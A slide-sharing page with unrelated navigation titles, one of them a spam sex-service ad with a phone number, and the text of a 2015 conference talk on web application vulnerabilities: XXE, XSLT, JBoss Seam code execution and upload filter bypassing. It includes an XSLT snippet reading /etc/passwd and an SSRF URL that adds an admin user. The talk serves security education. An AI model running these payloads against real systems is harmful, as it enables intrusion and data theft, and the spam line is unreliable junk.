Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptkotipi9215
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
XpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsXpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsMehedi Hasan Shohan
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfjoe51371421
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - InfographicHr365.us smith
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 

Recently uploaded (20)

BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanation
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.ppt
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
XpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsXpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software Solutions
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdf
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - Infographic
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 

CONFidence 2015: Nietypowe problemy bezpieczeństwa w aplikacjach webowych - Michał Sajdak

  • 1. Unusual security problems in web applications. Michał Sajdak, CISSP, CEH, F2B securitum.pl sekurak.pl rozwal.to
  • 2. About me Michał Sajdak <at> securitum.pl Pentester Instructor (security trainings) sekurak.pl founder rozwal.to founder 2 Copyright 2014 Securitum www.securitum.pl
  • 3. Agenda Vulnerabilities in Nuxeo First public disclosure (Maybe?) not so obvious path traversal(s) OS code exec XXE JBoss Seam nice RCE RCE through XSLT transformation (if we have time) PHP shell upload – filter bypassing (if we have time) Educational use only 3 Copyright 2014 Securitum www.securitum.pl
  • 4. Nuxeo Content Management Platform for the Software-Defined Enterprise 4 Copyright 2015 Securitum www.securitum.pl
  • 5. Nuxeo The RPM (Release and Preservation Management) Department at EA uses the Nuxeo Platform to manage video game builds at all stages of the development lifecycle Using the Nuxeo Platform as a core server, Jeppesen, a Boeing company, syncs flight bag information to iPads for pilots across the world. 5 Copyright 2015 Securitum www.securitum.pl
  • 6. Nuxeo The Nuxeo Platform, offering strong support for SSO, along with a flexible content management platform, is the perfect addition to the US Navy’s application portfolio. Orange manages communication with its mobile telecommunications and broadband internet provider clients through a secure extranet portal built on the Nuxeo Platform. 6 Copyright 2015 Securitum www.securitum.pl
  • 7. Nuxeo History Bug patched this year (February) Reported by Michal Bentkowski & Sebastian Gilon from securitum.pl https://doc.nuxeo.com/display/ADMINDOC/Nuxeo+Security+ Update+-+2015-02-27+-+Critical No details disclosed DEMO 7 Copyright 2015 Securitum www.securitum.pl
  • 8. Nuxeo – reporting history Securitum: Hey, you got some nasty bugs in your platform. Here are the details. Nuxeo: Cool, these are definitely nice bugs! We’ll prepare a patch soon! BTW: do you want something for reporting the bug? Securitum: no :-) Nuxeo: Do you drink from time to time? Securitum: Sometimes :P Nuxeo: Cool, we are sending 2 crates of vine to Poland 8
  • 10. XXE (XML eXternal Entities) XXE has been known for a while But many many applications are vulnerable by default BTW: XXE tests are available only in the latest versions of burp suite (very popular web pentesting tool) 10 Copyright 2014 Securitum www.securitum.pl
  • 11. XXE (XML eXternal Entities) HTML entiries &lt; lub &#60; < &quot; &apos; &amp; &micro; … Or: &entity_name; &#entity_number; 11 Copyright 2014 Securitum www.securitum.pl
  • 12. HTML entities Similar in XML… 12 Copyright 2014 Securitum www.securitum.pl
  • 13. XXE (XML eXternal Entities) … but we can define our own entities <!ENTITY name "value"> 13 Copyright 2014 Securitum www.securitum.pl
  • 15. 15
  • 16. XXE (XML eXternal Entities) We can only read files? No :p Making http requests Transfering files to your server (blind XXE) Making request to 127.0.0.1 Some of these are unauthenticated ? Scanning backend infrastruture Services with no auth check, etc. http://10.0.0.75:8080/usrMgmt/add/admin2/admin2 16 Copyright 2014 Securitum www.securitum.pl
  • 17. XXE (XML eXternal Entities) Actually we can often exploit XXE when no tag is displayed (!) ie. only when the XML parser starts. Parameter Entity They can be used only in DOCTYPE <!ENTITY % name "entity_value"> 17 Copyright 2014 Securitum www.securitum.pl
  • 19. XXE (XML eXternal Entities) Can we only read files? No :P Making http requests Transfering files to your server (blind XXE) FW must allow outgoing http communication Making request to 127.0.0.1 Some of there are unauthenticated ? Scanning backend infrastructore Services with no auth check, etc. 19 Copyright 2014 Securitum www.securitum.pl
  • 20. XXE (XML eXternal Entities) DEMO 20 Copyright 2014 Securitum www.securitum.pl
  • 21. XSLT XSLT (Extensible Stylesheet Language Transformations) is a language for: transforming XML documents into other XML documents or other formats such as HTML for web pages, plain text © wikipedia 21 Copyright 2014 Securitum www.securitum.pl
  • 22. XSLT Commonly used for custom styling in web apps XML (db generated) + XSLT (user provided styles) = nice HTML = nice PDF etc. 22 Copyright 2014 Securitum www.securitum.pl
  • 24. XSLT We can have a problem when a user (ie. attacker) can provide XSL file to be parsed at server side Example: custom destkop in web app Example: print templates … 24 Copyright 2014 Securitum www.securitum.pl
  • 26. XSLT PHP Doesn’t work by default… But reading files does: <xsl:template match="/"> <xsl:copy-of select="document('/etc/passwd')"/> </xsl:template> 26 Copyright 2014 Securitum www.securitum.pl
  • 27. OS Command Exec – JBoss Seam But an example of the following problem We deploy an app which uses library X After some time… vulnerabilities in the used lib Info: Meder Kydyraliev, Seam Vulnerability, http://blog.o0o.nu/ 27 Copyright 2014 Securitum www.securitum.pl
  • 28. OS Command Exec – JBoss Seam There is (are) a vulnerability in JBoss Seam which allows you to exec OS code No auth needed No specific condition needed The only requirement – an app is using the vulnerable version of the lib DEMO 28 Copyright 2014 Securitum www.securitum.pl
  • 29. Upload / Apache – filter bypassing Commonly used methods: File extension blacklisting ie.: no .php / .jsp / etc. can be uploaded Checking file structure ie.: if the uploaded file is a real image / pdf / etc 29 Copyright 2014 Securitum www.securitum.pl
  • 30. Upload / Apache – filter bypassing Interesting fact How many of apache servers will interpret the following file: test.jpg.php.wnk2j3.tralalala.sekurak txt ? php ? jpg ? 30 Copyright 2014 Securitum www.securitum.pl
  • 32. What’s next? dotnetnuke – full unauth admin TP-link devices Two new methods for gaining OS root One sort of universal – works in old/new devices Disclosure on sekurak.pl ~soon 32 Copyright 2014 Securitum www.securitum.pl
  • 34. 34